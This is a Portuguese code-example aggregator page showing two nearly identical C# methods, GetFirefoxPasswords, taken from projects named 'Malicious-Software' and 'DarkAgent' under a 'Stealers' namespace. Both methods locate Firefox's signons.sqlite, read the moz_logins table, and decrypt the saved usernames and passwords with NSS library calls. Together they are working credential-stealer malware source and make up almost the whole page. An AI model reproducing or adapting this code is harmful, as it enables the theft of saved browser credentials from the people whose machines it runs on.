Exemplos de DarkAgent_Client.src.Features.Stealers.Firefox SQLiteBase em C# (CSharp)

Linguagem de programação: C# (CSharp)

Espaço para nome / nome do pacote: DarkAgent_Client.src.Features.Stealers.Firefox

Classe / Tipo: SQLiteBase

Exemplos em hotexamples.com: 2

DarkAgent_Client.src.Features.Stealers.Firefox SQLiteBase em C# (CSharp) - 2 exemplos encontrados. Esses são os exemplos do mundo real mais bem avaliados de DarkAgent_Client.src.Features.Stealers.Firefox.SQLiteBase em C# (CSharp) extraídos de projetos de código aberto. Você pode avaliar os exemplos para nos ajudar a melhorar a qualidade deles.

Métodos Frequentes

Exibir Ocultar

ExecuteQuery(1)

Métodos Frequentes

ExecuteQuery (1)

Relacionados

KinectFramesStore

Animation

SecondaryDataHibc

EqualizerFilter

ResultCode

DVehiculos

SearchTextOrder

ШапкаЭкраннойФормы

IGroupEscalateItemPerformanceTracker

Reminder

Related in langs

framework_check_extension_usage (PHP)

sp_post_checklist (PHP)

xen_smp_init (C++)

VarVec (C++)

AcceptedURL (Go)

InitWithConfig (Go)

ClassFunction (Java)

AnswerTuples (Java)

robot (Python)

encode (Python)

Exemplo n.º 1

0

Exibir arquivo

Arquivo: Firefox.cs Projeto: yeshuopp123/Malicious-Software

public static List <PasswordInfo> GetFirefoxPasswords() { if ((IntPtr.Size * 8) == 64) { return(new List <PasswordInfo>()); } bool FoundFile = false; long KeySlot = 0; string MozillaPath = Environment.GetEnvironmentVariable("PROGRAMFILES") + @"\Mozilla Firefox\"; string DefaultPath = Environment.GetEnvironmentVariable("APPDATA") + @"\Mozilla\Firefox\Profiles"; string[] Dirs = Directory.GetDirectories(DefaultPath); foreach (string dir in Dirs) { if (!FoundFile) { string[] Files = Directory.GetFiles(dir); foreach (string CurrFile in Files) { if (!FoundFile) { if (System.Text.RegularExpressions.Regex.IsMatch(CurrFile, "signons.sqlite")) { NSS_Init(dir); signon = CurrFile; } } else { break; } } } else { break; } } string dataSource = signon; TSECItem tSecDec = new TSECItem(); TSECItem tSecDec2 = new TSECItem(); byte[] bvRet; SQLiteBase db = new SQLiteBase(dataSource); DataTable table = db.ExecuteQuery("SELECT * FROM moz_logins;"); DataTable table2 = db.ExecuteQuery("SELECT * FROM moz_disabledHosts;"); KeySlot = PK11_GetInternalKeySlot(); PK11_Authenticate(KeySlot, true, 0); List <PasswordInfo> passwords = new List <PasswordInfo>(); foreach (System.Data.DataRow Zeile in table.Rows) { PasswordInfo info = new PasswordInfo(); info.URL = System.Convert.ToString(Zeile["formSubmitURL"].ToString()); StringBuilder se = new StringBuilder(Zeile["encryptedUsername"].ToString()); int hi2 = NSSBase64_DecodeBuffer(IntPtr.Zero, IntPtr.Zero, se, se.Length); TSECItem item = (TSECItem)Marshal.PtrToStructure(new IntPtr(hi2), typeof(TSECItem)); if (PK11SDR_Decrypt(ref item, ref tSecDec, 0) == 0) { if (tSecDec.SECItemLen != 0) { bvRet = new byte[tSecDec.SECItemLen]; Marshal.Copy(new IntPtr(tSecDec.SECItemData), bvRet, 0, tSecDec.SECItemLen); info.Username = System.Text.Encoding.ASCII.GetString(bvRet); } } StringBuilder se2 = new StringBuilder(Zeile["encryptedPassword"].ToString()); int hi22 = NSSBase64_DecodeBuffer(IntPtr.Zero, IntPtr.Zero, se2, se2.Length); TSECItem item2 = (TSECItem)Marshal.PtrToStructure(new IntPtr(hi22), typeof(TSECItem)); if (PK11SDR_Decrypt(ref item2, ref tSecDec2, 0) == 0) { if (tSecDec2.SECItemLen != 0) { bvRet = new byte[tSecDec2.SECItemLen]; Marshal.Copy(new IntPtr(tSecDec2.SECItemData), bvRet, 0, tSecDec2.SECItemLen); info.Password = System.Text.Encoding.ASCII.GetString(bvRet); } } passwords.Add(info); } return(passwords); }

Exemplo n.º 2

0

Exibir arquivo

Arquivo: Firefox.cs Projeto: AtVirus/DarkAgent

public static List<PasswordInfo> GetFirefoxPasswords() { if ((IntPtr.Size * 8) == 64) return new List<PasswordInfo>(); bool FoundFile = false; long KeySlot = 0; string MozillaPath = Environment.GetEnvironmentVariable("PROGRAMFILES") + @"\Mozilla Firefox\"; string DefaultPath = Environment.GetEnvironmentVariable("APPDATA") + @"\Mozilla\Firefox\Profiles"; string[] Dirs = Directory.GetDirectories(DefaultPath); foreach (string dir in Dirs) { if (!FoundFile) { string[] Files = Directory.GetFiles(dir); foreach (string CurrFile in Files) { if (!FoundFile) { if (System.Text.RegularExpressions.Regex.IsMatch(CurrFile, "signons.sqlite")) { NSS_Init(dir); signon = CurrFile; } } else break; } } else break; } string dataSource = signon; TSECItem tSecDec = new TSECItem(); TSECItem tSecDec2 = new TSECItem(); byte[] bvRet; SQLiteBase db = new SQLiteBase(dataSource); DataTable table = db.ExecuteQuery("SELECT * FROM moz_logins;"); DataTable table2 = db.ExecuteQuery("SELECT * FROM moz_disabledHosts;"); KeySlot = PK11_GetInternalKeySlot(); PK11_Authenticate(KeySlot, true, 0); List<PasswordInfo> passwords = new List<PasswordInfo>(); foreach (System.Data.DataRow Zeile in table.Rows) { PasswordInfo info = new PasswordInfo(); info.URL = System.Convert.ToString(Zeile["formSubmitURL"].ToString()); StringBuilder se = new StringBuilder(Zeile["encryptedUsername"].ToString()); int hi2 = NSSBase64_DecodeBuffer(IntPtr.Zero, IntPtr.Zero, se, se.Length); TSECItem item = (TSECItem)Marshal.PtrToStructure(new IntPtr(hi2), typeof(TSECItem)); if (PK11SDR_Decrypt(ref item, ref tSecDec, 0) == 0) { if (tSecDec.SECItemLen != 0) { bvRet = new byte[tSecDec.SECItemLen]; Marshal.Copy(new IntPtr(tSecDec.SECItemData), bvRet, 0, tSecDec.SECItemLen); info.Username = System.Text.Encoding.ASCII.GetString(bvRet); } } StringBuilder se2 = new StringBuilder(Zeile["encryptedPassword"].ToString()); int hi22 = NSSBase64_DecodeBuffer(IntPtr.Zero, IntPtr.Zero, se2, se2.Length); TSECItem item2 = (TSECItem)Marshal.PtrToStructure(new IntPtr(hi22), typeof(TSECItem)); if (PK11SDR_Decrypt(ref item2, ref tSecDec2, 0) == 0) { if (tSecDec2.SECItemLen != 0) { bvRet = new byte[tSecDec2.SECItemLen]; Marshal.Copy(new IntPtr(tSecDec2.SECItemData), bvRet, 0, tSecDec2.SECItemLen); info.Password = System.Text.Encoding.ASCII.GetString(bvRet); } } passwords.Add(info); } return passwords; }